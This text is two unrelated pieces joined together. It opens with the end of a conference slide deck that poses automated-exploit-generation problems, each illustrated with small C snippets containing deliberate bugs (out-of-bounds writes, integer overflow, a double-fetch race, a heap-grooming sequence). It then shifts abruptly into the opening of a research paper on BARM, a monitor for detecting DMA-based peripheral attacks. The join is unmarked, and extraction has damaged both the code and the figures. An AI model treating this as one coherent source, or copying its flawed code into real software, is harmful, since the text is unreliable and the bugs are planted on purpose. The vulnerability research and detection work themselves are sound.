  else return 0;  
} 
POSTCOND (?)  
37 
Problem B code  
PRECOND (?)  
F(int x, int y) 
{ 
   int array[4];  
   int idx = G(x + y);  
   assert( idx >= 4);  
   array[ idx] = 0;  
} PRECOND (?)  
Int G(int x, int y) 
{ 
  if (x < y) return x;  
  else return 0;  
} 
POSTCOND (?)  
38 
Loop assertion inference  
Problem C:  Given a program loop and an assertion 
A1 within or at the loop exit -node, determine loop -
assertion A2 such as A1 is true if and only if A2 is 
true.  
 
Note:  A loop invariant is an assertion that must be 
verified at every iteration of the loop. Given that we 
work on a program anti -specification, the desired 
exploit loop assertion may not be necessarily a loop 
invariant (it could just be true at some iterations).  
39 
Problem C code  
F(char * buf, int bufsz ) 
{ 
  int limit = bufsz ; 
  int idx = 0; 
  loop_assertion (?) 
  while ( i < limit)  
  { 
      if (buf[i] == ‘{’) limit++;  
      else if ( buf[i] == ‘}’) limit --; 
      i++; 
  } 
  assert( i >= sizeof (buf)); 
  buf[i] = 0;  
} 
 40 
Exploit input definability  
Problem D:  Given an initial state I of a program 
P with functions and loops, exhibit an algorithm 
converging to a desired sink state.  
 
A desired sink state can be defined as an 
assertion in the program (more weakly: as a set 
of chosen variables values).  
41 
Problem D code  
Precondition(?)                   // D = A + B + C        
F(int x, int y) 
{ 
    int loc[4]; 
    int idx = G(x, y);  
    if (idx > 4) 
       return -1; 
    while (x < y) idx++; 
    assert( idx >= 4); // how to reach this?  
    loc[idx] = 0x00;  
} 
42 
Exploit derivability  
Problem E:  Given a concrete program input and 
associated program crash/log, find the longest 
crash trace prefix from which the desired 
exploitable program state can be reached.  
 
The available program crash/log can be:  
 
(1) Full (unlimited access to all values ever)  
(2) Partial (only active values are tracked)  
(3) Control -only (ex: a stack or instructions trace)  43 
Problem E code  
/* Crash possibly generated by fuzz testing */  
F(int x, int y) 
{ 
  int loc[4]; 
  if ((x + y) > 4)    // buggy check  
       return (loc[x]);          // program crash here  
  else if ((x + y) <= 4) {   // still buggy check  
      x = G(x, y );     
      loc[x] = 0;                 // how to reach here?   
      return (0);  
    } 
} 
Int G(int x, int y) { while (x < y) x ++; return (x); }  
 44 
Multi -interaction exploit  
Problem F:  Given a program initial state I, a 
desired program state U unreachable from I 
within any single program interaction R, 
determine all intermediate states T such as 
multiple interactions Ri can be composed to 
reach U as in : R1(I,T) + R2(T,U)  
 
Transitive decomposition : determine minimum 
number of interactions to reach U from I .  
45 
Problem F code  
Char *glob;  
F(int x, int y)       // Ex: F and G are syscalls  
{ 
  glob = malloc (x + y);             // integer overflow  
} 
G() 
{ 
  glob[x] = 0;                            // array OOB access  
} 
 
 
How to construct Trigger() = { F(); G(); } ?  
46 
Minimal concurrent exploit  
Problem G:  Given a program P , a desired exploit state S, and a 
thread count C, find the minimal state space representation to 
reach S in some execution of P while retaining ability to 
generate corresponding concrete input.  
 
Note 1: Partial Order Reduction  is a generic framework that 
can help control state space explosion.  
 
Note 2:  Minimal state space representation is dependent on 
desired sink state (as in Abstract Interpretation ). 
 
Example of research in this area: “Identifying and Exploiting 
Windows Kernel Race Conditions via Memory Access 
Patterns” ( Jurczyk  / Coldwind , 2013)  
47 
Problem G code  
/* Example of basic TOC/TOU vulnerability */  
/* ptr holds a valid non -volatile pointer */  
F(unsigned int *ptr) 
{ 
  if (*ptr > 0x10) return;  
  global ->ptr = malloc (*ptr + 1);  
  if (global ->ptr == NULL) return;  
  global ->ptr[*ptr] = 0x00;      // double -fetch!  
} 
 
If ptr is “modified under” by another thread, the second 
array access can go OOB.  
48 
Privilege Separation Inference  
Problem H:  Given a program P , determine code privilege 
partitioning.  For each partition, determine entry points.  
 
(1) Determine variables guarding privilege level (PL)  
(2) Partition functions so that all elements of a given 
partition share the same PL.  If static partitioning does not 
exist, determine parameters of dynamic partitioning.  
 
Partitioning can determine multi -stage exploits paths:  
•Remote  Local  Kernel  
•Remote  Sandboxed  Unsandboxed  
•Remote  Non -authenticated  Authenticated  49 
Problem H code  
bool authenticated = false;  
Int F() 
{ 
   authenticated = check_creds (); 
   // execute at authenticated level  
   if (authenticated)  
   { 
      bool  res = serve_client ();    
      if (!res) return ( send_error (E_FUNC));  
      return (0);  
   } 
  // execute at non -authenticated level  
  return ( send_error (E_AUTH));     
} 
Note:  send_error () can execute at multiple privilege levels.  50 
Heap likelihood inference  
Problem I: Given a program P using a non -deterministic 
heap allocator, determine most exploitable random walk(s) 
for P to reach “aligned” exploitable heap state.  
 
(1)Assume existence of heap corruption C in P  
(2)Identify set S of exploitable heap states w.r.t. C  
(3)Minimize steps to reach any element of S  
 
 
See previous Markov exploit description. This problem is 
particularly relevant in presence of heap randomization.  
 
 51 
Problem I code  
Struct  s1 { int *ptr; } *p1a = NULL, *p1b = NULL, *p1c = NULL;  
Struct  s2 { int authenticated; } *p2 = NULL;  
 
F() { 
  p1a = (struct  s1*) calloc (sizeof (struct  s1), 1);  
  p1b = (struct  s1*) calloc (sizeof (struct  s1), 1);  
  p1c = (struct  s1*) calloc (sizeof (struct  s1), 1);  
} 
G() { p2 = (struct  s2*) calloc (sizeof (struct  s2), 1); } 
H() { free(p1b ); } 
I() { memset (p1a , 0x01, 32); }  
J() { if (p2 && p 2->authenticated) puts(“you win”); }   // Print this  
K() { if (p1a && p1a ->ptr) *(p1a ->ptr) = 0x42; }            // Avoid crash here  
 
Iff allocator reuses p1b’s memory to allocate p2 with max probability:  
Automate best walk = { F(); H(); G(); I(); J(); }  
52 
Generalized program timing attack  
Problem J:  Define the necessary and sufficient execution 
time analysis conditions to infer value, size, or location of:  
 
(1) A program control structure  
–Return address, Function Pointer, Exception Handler, etc.  
(2) A program data structure  
–Heap chunk, Stack Frame, Global variable, etc.  
(3) A program code fragment  
–Instruction, Function, Method, etc.  
 
In other words, automate program time inference to defeat 
address space randomization.  
53 
Problem J examples  
The problem is stated in very generic terms on purpose.  
 
Resolution depends on target -specific implementation.  
 
For two great starting point on timing inference, see:  
 
Cryptographic timing attacks on DH, RSA, DSS and other systems  
(Paul C. Kocher, 1996)  
http:// www.cryptography.com/public/pdf/TimingAttacks.pdf  
 
Program timing attacks on Firefox hash tables  
(Paul @ pa_kt , 2012)  
http://gdtr.wordpress.com/2012/08/07/leaking -information -with -
timing -attacks -on-hashtables -part-1/ 
 
54 
Indirect information disclosures  
Problem K:  Define the necessary and sufficient 
conditions to infer the value or address of a 
variable without a direct read primitive, such as:  
 
(1) Data reuse attacks  
(example: partial pointer overrides)  
 
(2) Pointer value prediction attacks  
(example: pointer inference)  
55 
Problem K examples  
Resolution of Problem K depends on target -specific 
implementation.  
 
Prior art on Indirect information disclosures includes:  
 
Flash Pointer Inference ( Blazakis , 2010)  
http:// www.semantiscope.com/research/BHDC2010/BHD
C-2010 -Paper.pdf  
 
Garbage Collection marking attack ( Blazakis , 2013)  
http:// www.trapbit.com/talks/Summerc0n2013 -
GCWoah.pdf  
 
56 
Conclusion  
•We decomposed the problem of Automated 
Exploit Generation in a set of challenges with 
clear intermediate assumptions.  
•Resolving one such sub -problem is a step towards 
automated end -to-end solutions of larger and 
larger sub -classes of exploits.  
•Even though Automated Exploitation is an 
undecidable  problem,  observing that most 
vulnerabilities are shallow allows the problem to 
be approached.  
57 
Questions  / Discussion  
•Thanks for attending H2HC’s 10th anniversary  
 
 
•Questions and feedback welcomed by email  
 
58 A Primitive for Revealing Stealthy
Peripheral-Based Attacks on the Computing
Platform’s Main Memory
Patrick Stewin
Security in Telecommunications, TU Berlin
patrickx@sec.t-labs.tu-berlin.de
Abstract. Computer platform peripherals such as network and man-
agement controller can be used to attack the host computer via direct
memory access (DMA). DMA-based attacks launched from peripherals
are capable of compromising the host without exploiting vulnerabilities
present in the operating system running on the host. Therefore they
present a highly critical threat to system security and integrity. Un-
fortunately, to date no OS implements security mechanisms that can
detect DMA-based attacks. Furthermore, attacks against memory man-
agement units have been demonstrated in the past and therefore cannot
be considered trustworthy. We are the first to present a novel method for
detecting and preventing DMA-based attacks. Our method is based on
modeling the expected memory bus activity and comparing it with the
actual activity. We implement BARM, a runtime monitor that perma-
nently monitors bus activity to expose malicious memory access carried
out by peripherals. Our evaluation reveals that BARM not only detects
and prevents DMA-based attacks but also runs without significant over-
head due to the use of commonly available CPU features of the x86
platform.
Keywords: Direct Memory Access (DMA), DMA Malware, Intrusion
Detection, Operating System Security
1 Introduction
Computer platform peripherals, or more precisely, dedicated hardware such as
network interface cards, video cards and management controller can be exploited
to attack the host computer platform. The dedicated hardware provides the at-
tacker with a separate execution environment that is not considered by state-of-
the-art anti-virus software, intrusion detection systems, and other system soft-
ware security features available on the market. Hence, dedicated hardware is
quite popular for stealthy attacks [1–6]. Such attacks have also been integrated
into exploitation frameworks [7, 8].
For example, Duflot et al. presented an attack based on a Network Inter-
face Card (NIC) to run a remote shell to take-over the host [9]. They remotely
infiltrated the NIC with the attack code by exploiting a security vulnerability.
2 Patrick Stewin
Triulzi demonstrated how to use a combination of a NIC and a video card (VC)
to access the main memory [5, 6] that enables an attacker to steal cryptographic
keys and other sensitive data. Triulzi remotely exploited the firmware update
mechanism to get the attack code on the system. Stewin et al. exploited a μ-
controller that is integrated in the computer platform’s Memory Controller Hub
(MCH) to hide a keystroke logger that captures, e. g., passwords [4].
All these attacks have in common that they have to access the main mem-
ory via Direct Memory Access (DMA). By doing so, the attacks completely
circumvent hardened security mechanisms that are set up by system software.
Furthermore, the attack does not need to exploit a system software vulnerability.
Devices that are capable of executing DMA transactions are called Bus Mas-
ters. The host Central Processing Unit (CPU) that usually executes security
software to reveal attacks, does not necessarily have to be involved when other
bus masters access the main memory [4]. Due to modern bus architectures, such
asPeripheral Component Interconnect Express (PCIe), a sole central DMA con-
troller, which must be configured by the host CPU, became obsolete. Firmware
executed in the separate execution environment of the dedicated hardware can
configure the peripheral’s DMA engine to read from or to write to arbitrary
main memory locations. This is invisible to the host CPU.
In this paper we present our Bus Agent Runtime Monitor (BARM) – a mon-
itor that reveals and stops stealthy peripheral-based attacks on the computing
platform’s main memory. We developed BARM to prove the following hypothe-
sis: The host CPU is able to detect additional (malicious) accesses to the plat-
form’s main memory that originate from platform peripherals, even if the host
CPU is unable to access the isolated execution environment of the attacking pe-
ripheral. With additional access we mean access that is not intended to deliver
data to or to transfer data on behalf of the system software.
BARM is based on a primitive that is able to analyze memory bus activity.
It compares actual bus activity with bus activity that is expected by system
software such as the Operating System (OS) or the hypervisor. BARM reports
an attack based on DMA if it detects more bus activity than expected by the
system software. BARM is able to identify the malicious peripheral.
Several preventive approaches concerning DMA attacks have been proposed.
For example the Input/Output Memory Management Unit (I/OMMU) that can
be applied to restrict access to the main memory. For instance, Intel developed
an I/OMMU and calls the technology Intel Virtualization Technology for Di-
rected I/O (VT-d, [10]). The aim of VT-d is to provide hardware supported
virtualization for the popular x86 platform. Unfortunately, I/OMMUs cannot
necessarily be trusted as a countermeasure against DMA attacks for several rea-
sons. For instance, the I/OMMU (i) must be configured flawlessly [11], (ii) can
be sucessfully attacked [12–15], and (iii) cannot be applied in case of memory
access policy conflicts [4]. Furthermore, I/OMMUs are not supported by every
chipset and system software (e. g., Windows Vista and Windows 7). Another
preventive approach is to check the peripheral firmware integrity at load time.
Unfortunately, such load time checks do not prevent runtime attacks. Repeating
Revealing Stealthy Peripheral-Based Attacks on Main Memory 3
the checks permanently to prevent runtime attacks is borne at the cost of sys-
tem performance. Note, this also does not necessarily capture transient attacks.
Furthermore, it is unclear if the host CPU has access to the whole Read-Only
Memory (ROM) that stores the peripheral’s firmware.
To the best of our knowledge we are the first to address the challenge of
detecting malicious DMA with a primitive that runs on the host CPU. By mon-
itoring bus activity our method does not require to access the peripheral’s ROM
or its execution environment. Our primitive is implemented as part of the plat-
form’s system software. The basic idea is: The attacker cannot avoid causing
additional bus activity when accessing the platform’s main memory. This addi-
tional bus activity is the Achilles’ heel of DMA-based attacks that we exploit to
reveal and stop the attack.
Our Proof-of-Concept (PoC) implementation BARM implements a monitor-
ing strategy that considers transient attacks. The main goal of our technique is
to monitor memory access of devices connected to the memory bus. Especially,
host CPU cores fetch data as well as instructions of a significant amount of pro-
cesses. This is aggravated by the in- and output (I/O) of peripherals such as
network interface cards and harddisks. BARM demonstrates how to meet these
challenges.
Contributions: In this work we present a novel method to detect and stop DMA-
based attacks. This includes a new mechanism to monitor the complete memory
bus activity via a primitive executed on the host CPU. Our method is based
on modeling the expected memory bus activity. We further present a reliable
technique to measure the actual bus activity. We reveal malicious memory ac-
cess by comparing the modeled expected activity with the measured activity.
Any additional DMA activity can be assumed to be an attack. In addition, we
can identify the offending peripheral. We implemented and evaluated our inno-
vative detection model in a PoC that we call BARM. BARM is efficient and
effective enough that it can not only detect and stop DMA-based attacks before
the attacker caused any damage. It also considers transient attacks with negli-
gible performance overhead due to commonly available CPU features of the x86
platform.
Finally, our solution against DMA attacks does not require hardware or
firmware modifications.
Paper Structure: In Section 2 we present our trust and adversary model. In
Section 3 we explain our general model to detect peripheral-based attacks on the
platform’s main memory. Section 4 covers our PoC implementation of BARM
based on the popular Intel x86 platform with a PCIe bus system. We evaluate
our implementation in Section 5 and discuss related work in Section 6. The last
section presents our conclusions as well as future work.
4 Patrick Stewin
2 Trust and Adversary Model
In our scenario we assume that an attacker aims to attack a computer platform in
a stealthy manner. The attacker uses the stealth potential of a platform periph-
eral or of dedicated hardware that is connected to the memory bus, respectively.
Furthermore, we assume the attacker is able to attack the target platform dur-
ing runtime. This can be done remotely using a firmware exploit or a remote
firmware update mechanism as demonstrated in [16] or in [6], respectively.
The attacker aims to read data from or write data to the main memory via
DMA. Software (system software as well as application software) executed on the
target platform, i. e., on the host CPU, is in a trusted state before the platform
is under attack. That means, that BARM has been started in a trustworthy
manner and hence, BARM will deliver authentic reports. These reports will be
used to apply a certain defense policy in the case an attack has been detected.
We do not count on preventive approaches such as I/OMMUs.
3 General Detection Model
Two core points are the basis for our detection model. First, the memory bus
is a shared resource (see Figure 1). Second, the system software, i. e., the OS,
records all I/O activity in the form of I/O statistics.
Bus masters (CPU and peripherals) are connected to the main memory via
the memory bus. That bus provides exactly one interface to the main memory
that must be shared by all bus masters, see Figure 1. We see this shared resource
as a kind of hook or as the Achilles’ heel of the attacker. The fact of the shared
resource can be exploited by the host CPU to determine if another bus master is
using the bus. For example, if the host CPU cannot access the bus for a certain
amount of time, the OS can conclude that another bus master is using the bus.
To be able to detect that the bus is used by another party is insufficient. The
host CPU needs to assign the detected bus activity to OS I/O. OSes record I/O
activity in the form of I/O statistics. Consider the following case: We assume
that the ethernet controller is the only active bus master. When the ethernet
controller forwards a network packet of size S=sbytes to the OS, it copies the
packet via DMA into the main memory and interrupts the OS. The OS handles
the interrupt and updates its I/O statistics. The OS increases the number of
received network packets by 1 packet and the number of received network packet
bytes bysbytes . Copying a network packet of sbytes always results in the same
amount of expected bus activity Ae. This expected value Aecan be determined
by the OS using its I/O statistics and can afterwards be compared with the
actual measured bus activity value Amthat is determined when the OS handles
the interrupt. IfAm=Aenoadditional bus activity value Aa=Am−Aecould
be measured. IfAa>0, additional bus activity has been measured. Hence, a
DMA attack is detected due to additional memory access.
How exactly the host CPU/OS determines malicious bus activity is depen-
dent of the implementation. We investigated multiple directions based on timing
Revealing Stealthy Peripheral-Based Attacks on Main Memory 5
CPUCPU
OSI/O Stats
Bus Monitor??
aa =  = ??
mm -  - ??
eeMain MemoryMain Memory
00101010111011001101110101
01101010101001011010101101
11010110101010110101010101
01001010101010101011010101
10101101010101011010101101
10110101101010100100101000
01010110010101100101101010Ethernet ControllerEthernet Controller
Harddisk ControllerHarddisk Controller......Video ControllerVideo Controller
......
Fig. 1. Bus Master Topology Exploited to Reveal Malicious Memory Access:
If the difference of the measured bus activity value Amand the expected bus activity
valueAeis greater than 0, additional bus activity Aais measured and a DMA attack
is revealed.
measurements and bus transactions monitoring. Experiments with the timing
measurements of bus transactions are described in [11], for example. Timing
measurements of memory transactions are given in [17]. Our experiments re-
vealed that counting bus transaction events is the most reliable method. We
present the implementation of that novel method in Section 4.
4 An Implementation of the Detection Model
In this section we describe our implementation of the general detection model
based on bus transaction event counting. The purpose of our PoC implemen-
tion BARM is to prove our hypothesis that we made in Section 1. We imple-
mented BARM for the Intel x86 platform. We developed BARM as a Linux
kernel module. To understand our implementation of BARM we need to provide
some background information in the following subsection.
4.1 Background
In this section we explain the bus system of our implementation platform as well
as the hardware features we use to implement BARM.
Bus Master Transactions: A computer platform has several bus systems,
such as PCIe and Front-Side Bus (FSB). Hence, a platform has different kinds
of bus masters depending of the bus systems, see Figure 2.
A bus master is a device that is able to initiate data transfers (e. g., from an
I/O device to the main memory) via a bus, see [20, Section 7.3]. A device (CPU,
I/O controller, etc.) that is connected to a bus is not per se a bus master. The
device is merely a bus agent , see [23, p.13]. If the bus must be arbitrated a bus
master can send a bus ownership request to the arbiter [24, Chapter 5]. When
the arbiter grants bus ownership to the bus master, this master can initiate bus
transactions as long as the bus ownership is granted. In Section 4.2 we describe
the bus masters we considered for our BARM implementation.
Note, this procedure is not relevant for PCIe devices due to its point-to-
point property. The PCIe devices do not have to be arbitrated and therefore,
6 Patrick Stewin
  Memory  Controller
          Hub  (MCH)         Memory  Controller
          Hub  (MCH)        Front-Side Bus (FSB,  Processor Bus)
Processor / Host Interface
Main MemoryMain Memory00101010111011001101110101011010101010010110101011011101011010101011010101010101001010101010101011010101101011010101010110101011011011010110
Harddisk ControllerHarddisk ControllerVideo ControllerVideo ControllerCPUCPU
I/O Controller Hub (ICH)I/O Controller Hub (ICH)  Ethernet   Controller  Ethernet   ControllerArbiterPCIe    
 
 Internal   BusUHCI ControllerUHCI Controller
DMA EngineDMA Engine
DMA EnginePCIe       
DMA Enginex86 Platform -  PCIe Bus System Bus Master
-  Processor Bus System Bus Master
Direct Media Interface (DMI)
Graphics
Interface
PCIe    Memory Bus
System Memory
Interface
...
Fig. 2. Bus Master Topology: Bus masters access the main memory via different
bus systems (e. g., PCIe, FSB). The MCH arbitrates main memory access requests of
different bus masters. (based on [18, p.504][19][20, Section 7.3][21, Section 1.3][22])
bus ownership is not required. The bus is not shared as it was formerly the case
with the PCIe predecessor PCI. Nonetheless, the bus master capability of PCIe
devices is controlled by a certain bit, that is called Bus Master Enable (BME).
The BME bit is part of a standard configuration register of the peripheral.
The MCH (out of scope of PCIe) still arbitrates requests from several bus
interfaces to the main memory [21, p.27], see Figure 2. The host CPU is also
a bus master. It uses the Front-Side Bus (FSB) to fetch data and instructions
from the main memory. I/O controller (e. g., UHCI, ethernet, harddisk controller,
etc.) provide separate DMA engines for I/O devices (e. g., USB keyboard/mouse,
harddisk, NIC, etc.). That means, when the main memory access request of a
peripheral is handled by the MCH, PCIe is not involved at all.
Determining Processor Bus System Bus Master Memory Transac-
tions: According to the experiment described in [4], malware, which is exe-
cuted in peripherals with a separate DMA engine, can access the main memory
stealthily. The host CPU does not necessarily have to be involved when a DMA-
based memory transaction is set up. Nonetheless, the memory bus is inevitable
a shared resource that is arbitrated by the MCH. This is the reason why we
expect side effects when bus masters access the main memory.
We analyzed the capabilities of Performance Monitoring Units (PMU, [25,
Section 18.1]) to find and exploit such DMA side effects. PMUs are implemented
asModel-Specific Registers (MSR, processor registers to control hardware-related
features [25, Section 9.4]). These registers can be configured to count perfor-
mance related events. The PMUs are not intended to detect malicious behavior
on a computer system. Their purpose is to detect performance bottlenecks to
enable a software developer to improve the performance of the affected software
accordingly [26]. In this work we exploit PMUs to reveal stealthy peripheral-
based attacks on the platform’s main memory. Malware executed in peripherals
has no access to processor registers and therefore cannot hide its activity from
the host CPU by modifying the PMU processor registers.
Revealing Stealthy Peripheral-Based Attacks on Main Memory 7
Our analysis revealed memory transaction events that can be counted by
PMUs. In particular, a counter event called BUSTRANS MEMsummarizes all burst
(full cache line), partial read/write (non-burst) as well as invalidate memory
transactions, see [27]. This is the basis for BARM.
Depending on the precise processor architecture, Intel processors provide five
to seven performance counter registers per processor core [25, Section 18]. In this
case, at most five to seven events can be counted in parallel with one processor
core. Three of those counters are fixed function counters, i. e., the counted event
cannot be changed. The other counters are general purpose counters that we use
for BARM to count certain BUSTRANS MEMevents.
We are able to successfully measure Amwhen we apply the BUSTRANS MEM
counters correctly. At this point, that knowledge is insufficient to decide if the
transactions exclusively relate to an OS task or if malicious transactions are
also among them. In the following, we lay the groundwork to reveal malicious
transactions originating from a compromised DMA-capable peripheral.
4.2 Bus Master Analysis
In the following we analyze the host CPU (related to the processor bus system)
and the UHCI controller (related to the PCIe bus system) bus masters regarding
the number of bus transactions that they cause. By doing so, we consider the
most important bus systems that share the memory bus. Other bus masters,
such as harddisk and ethernet controllers, can be analyzed in a similar way.
Host CPU: The host CPU is maybe the most challenging bus master. The CPU
causes a huge amount of memory transactions. Several processor cores fetch in-
structions and data for many processes. Monitoring all those processes efficiently
regarding the bus activity that they cause is nearly impossible. Hence, we decided
to analyze the host CPU bus agent behavior using the BUSTRANS MEMevents in
conjunction with certain control options and so called event name extensions.
We implemented a Linux kernel module for this analysis. Our key results are: (i)
Bus events caused by user space and kernel space processes can be counted with
one counter. (ii) The event name extensions THIS AGENT andALLAGENTS can be
used in conjunction with BUSTRANS MEMevents [27] to distinguish between bus
transactions caused by the host CPU and all other processor bus system bus
masters. THIS AGENT counts all events related to all processor cores belonging to
a CPU bus agent. ALLAGENTS counts events of all bus agents connected to the
bus where the host CPU is connected to.
The ALLAGENTS extension is very important for our implementation. It en-
ables us to measure the bus activity value Am(see Section 3) in terms of number
of bus transactions: Am=BUSTRANSMEM.ALL AGENTS .
Furthermore, our analysis revealed that a host CPU is not necessarily exactly
one bus agent. A multi-core processor can consist of several bus agents. For ex-
ample, we used a quad-core processor (Intel Core 2 Quad CPU Q9650@3.00GHz)
that consists of two bus agents. Two processor cores embody one bus agent as
8 Patrick Stewin
CPUCPU
Core #0
Core #1Core #2
Core #3
Front-Side BusBus Agent #0 Bus Agent #1
(b)(b)
 (a)(a)
Fig. 3. Intel Quad-Core Processor: The quad-core processor consists of two bus
agents and each bus agent consists of two cores, see (a). When counting BUSTRANS MEM
events with both bus agents, i. e., in (b) BA#0 andBA#1, the THIS AGENT name extension
delivers significant difference. The kernel log in (b) also depicts that the values for the
ALLAGENTS name extension are pretty much the same within a counter query iteration.
depicted in Figure 3. Hence, the number of processor cores is important when
determining (il)legitimate bus transactions. Note, if the host CPU consists of
several bus agents, it is necessary to start one counter per bus agent with the
THIS AGENT event name extension.
With this knowledge we can determine bus master transactions of all bus
mastersAm. We can distinguish between bus activity caused by the host CPU
(ACPU
m =∑N
n=0BUSTRANSMEM.THIS AGENT cpubusagent #n,n∈N,
N=number of host CPU bus agents −1) and bus activity caused by all other
bus masters (ACPUm =Am−ACPU
m) that access the main memory via the MCH
(e. g., harddisk, ethernet, UHCI controller, etc.).
That means, we can subtract all legitimate bus transactions caused by user
space and kernel space processes of all processor cores. Note, according to our
trust and adversary model (see Section 2) the measured host CPU bus activity
value and the expected host CPU bus activity value are the same ( ACPU
e =
ACPU
m), since all processes running on the host CPU are trusted.
Our host CPU bus master analysis reveals that Amcan be split as follows:
Am=ACPU
m +ACPUm. It also makes sense to introduce this distinction for the
expected bus activity value: Ae=ACPU
e +ACPUe.
Universal Host Controller Interface Controller: The Universal Host Con-
troller Interface (UHCI) controller is an I/O controller for Universal Serial Bus
(USB) devices such as a USB keyboard or a USB mouse. USB devices are polled
by the I/O controller to check if new data is available. System software needs
to prepare a schedule for the UHCI controller. This schedule determines how a
connected USB device is polled by the I/O controller.
The UHCI controller permanently checks its schedule in the main memory.
Obviously, this procedure causes a lot of bus activity. Further bus activity is
generated by USB devices if a poll reports that new data is available. In the
following we analyze how much activity is generated, i. e., how many bytes are
transfered by the UHCI controller when servicing a USB device.
In our case, the I/O controller analyzes its schedule every millisecond. That
means, the controller looks for data structures that are called transfer descrip-
tors. These descriptors determine how to poll the USB device. To get the descrip-
Revealing Stealthy Peripheral-Based Attacks on Main Memory 9
tors the controller reads a frame pointer from a list every millisecond. A frame
pointer (physical address) references to the transfer descriptors of the current
timeframe. Transfer descriptors are organized in queues.
A queue starts with a queue head that can contain a pointer to the first
transfer descriptor as well as a pointer to the next queue head, see [28, p.6].
According to [28] the frame (pointer) list consists of 1024 entries and has a size
of 4096 bytes. The UHCI controller needs 1024 ms (1 entry /ms) for one frame
(pointer) list iteration. We analyzed the number of bus transactions for one
iteration with the help of the highest debug mode of the UHCI host controller
device driver for Linux. In that mode schedule information are mapped into the
debug file system. We figured out that the frame pointers reference to interrupt
transfer queues (see Figure 4 (d.i) and (d.ii): int2 ,int4 , . . . , int128 ) and to a
queue called async .int2 means, that this queue is referenced by every second
frame pointer, int4 by every fourth, int8 by every eighth, etc. The async queue
is referenced by every 128th frame pointer.
Unassigned interrupt transfer queues, i. e., queues not used to poll a USB
device, are redirected to the queue head of the async queue, see Figure 4 (b).
Parsing the async queue requires three memory read accesses as illustrated in
Figure 4 (a).
Parsing interrupt transfer queues that are assigned to poll a USB device needs
more than four memory reads. The exact number of memory reads depends on
how many elements the queue has. Usually, it has one element if the queue is
assigned to a USB keyboard. The queue can also have two elements if the queue
is assigned to a keyboard and mouse, for example. If the queue has one element,
parsing the whole assigned interrupt transfer queue needs six memory reads, see
Figure 4 (c). We summarize our examination as follows: 8 ·#async reads + 8·
#int128reads +16·#int64reads +32·#int32reads +64·#int16reads +128·
#int8reads + 256·#int4reads + 512·#int2reads = #busreadtransactions .
Ifint16 is assigned to a USB keyboard, as depicted in Figure 4 (d) for
example, we get the following number of bus read transactions: 8 ·3 + 8·4 + 16·
4 + 32·4 + 64·6 + 128·4 + 256·4 + 512·4 = 4216.
According to [28], the UHCI controller updates queue elements. We expect
this for the queue element of the int16 queue. This queue is referenced by 64
frame pointers. Hence, we calculate with 64 memory write transactions. That
means, the overall number of bus transactions is 4216 + 64 = 4280. We success-
fully verified this behavior with a Dell USB keyboard as well as a Logitech USB
keyboard in conjunction with the single step debugging mode of the UHCI con-
troller (see, [28, p.11]), the information was retrieved from the Linux debug file
system in /sys/kernel/debug/usb/uhci/ , and PMUs counting BUSTRANS MEM
events.
Counting USB Device Events: With the same setup we determined how many
bus transactions are needed when the USB device has new data that are to
be transmitted into the main memory. For our USB keyboard we figured out
that exactly two bus transactions are needed to handle a keypress event. The
same is true for a key release event. The Linux driver handles such events with
10 Patrick Stewin
(d.i)(d.i)
Read
ElementTerminates...Frame Pointer......
...Read         
Queue Head(a)(a)(b)(b)(c)(c)
    ReadTerminates...Frame Pointer......
...Read         
Queue Head    Read
ReadTerminates...Frame Pointer......
...Read         
Queue Head    Read
ElementQueue HeadRead
   Read(d.ii)(d.ii)
Fig. 4. UHCI Schedule Information (simplified): The schedule reveals that int
andasync queues are in use. The physical addresses of queue link targets are denoted in
brackets. A queue link or queue element, which terminates, contains the value 00000001
instead of a physical address. The int16 queue is responsible for our USB keyboard.
an interrupt routine. Hence, to determine the expected bus activity AUHCI
e we
request the number of handled interrupts from the OS and duplicate it. That
means for the overall number of bus transactions in our example: 4280 + 2 ·
#USB interrupts =AUHCI
e .
Further Bus Masters: To handle the bus activity of the whole computer plat-
form, the behavior of all other bus masters, such as the ethernet controller and
the harddisk controller, must also be analyzed similar to the UHCI controller.
We had to analyze one more bus master when we tested our detection model
on Lenovo Thinkpad laptops. We were unable to turn off the fingerprint reader
(FR) via the BIOS on an older Thinkpad model. Hence, we analyzed the finger-
print reader and considered this bus master for our implementation. We figured
out that it causes four bus transactions per millisecond. For this paper, or more
precisely, to verify our hypothesis, it is sufficient to consider up to five bus mas-
ters for BARM. Besides from the two CPU-based bus masters and the UHCI
controller we also consider Intel’s Manageability Engine (ME) as a bus master.
During normal operation we assume AME
e= 0. To be able to prove that our
detection model works with a computer platform we do not use all bus masters
available on the platform in our experiment. For example, we operate the Linux
OS completely from the computer’s main memory in certain tests of our evalu-
ation (see Section 5). This allows us to make use of the harddisk controller I/O
functionality as needed. We are preparing a technical report with further bus
master details, i. e., ethernet and harddisk controller, etc.
Summary of Bus Master Analysis: With the analysis presented in the pre-
vious sections we can already determine which bus master caused what amount
of memory transactions. This intermediate result is depicted in Figure 5.
Revealing Stealthy Peripheral-Based Attacks on Main Memory 11
Number of
Bus Transactions
(Scale: Log10)
0.1
1
10
100
1,000
10,000
100,000
1e+06
1e+07
Sampling in 1024ms Steps
0
10
20
30
40
50
60
70
All Three Bus Masters
Without 1st CPU Bus Master
Without 1st and 2nd CPU Bus Masters
No Active Bus Masters
Fig. 5. Breakdown of Memory Transactions Caused by Three Active Bus
Masters: The curve at the top depicts the number of all memory transactions of
all active bus masters (in our setup), that is, Am. The curve below depicts Amre-
duced by the expected memory transactions of the first CPU bus master, that is,
Am−ACPU BA #0
e . The next curve below represents Am−ACPU BA #0
e−ACPU BA #1
e .
The curve at the bottom represents Am−ACPU BA #0
e−ACPU BA #1
e−AUHCI
e .
4.3 Bus Agent Runtime Monitor
With the background information that we introduced in Section 4.1 we were able
to implement BARM in the form of a Linux kernel module. In this section we
describe how we implemented a monitoring strategy that permanently monitors
and also evaluates bus activity.
Permanent Monitoring: The performance monitoring units are already config-
ured to measure BUSTRANS MEMevents. The permanent monitoring of Am, i. e.,
ACPU
m andACPUm, is implemented using the following steps: (i) Reset counters
and store initial I/O statistics of all non-CPU bus masters (e. g., UHCI, FR,
ME, HD, ETH, VC). (ii) Start counting for a certain amount of time t(imple-
mented using high precision timer). (iii) Stop counters when tis reached. (iv)
Store counter values for AmandACPU
m (see Section 4.2) as well as updated I/O
statistics of all non-CPU bus agents. (v) Continue with step (i) and determine
Aein parallel by waking up the according evaluation kernel thread.
Comparison of Measured Bus Activity and Expected Bus Activity: BARM com-
paresACPUm andACPUe when executing the evaluation kernel thread as follows:
(i) DetermineACPUm using the stored counter values for AmandACPU
m (see
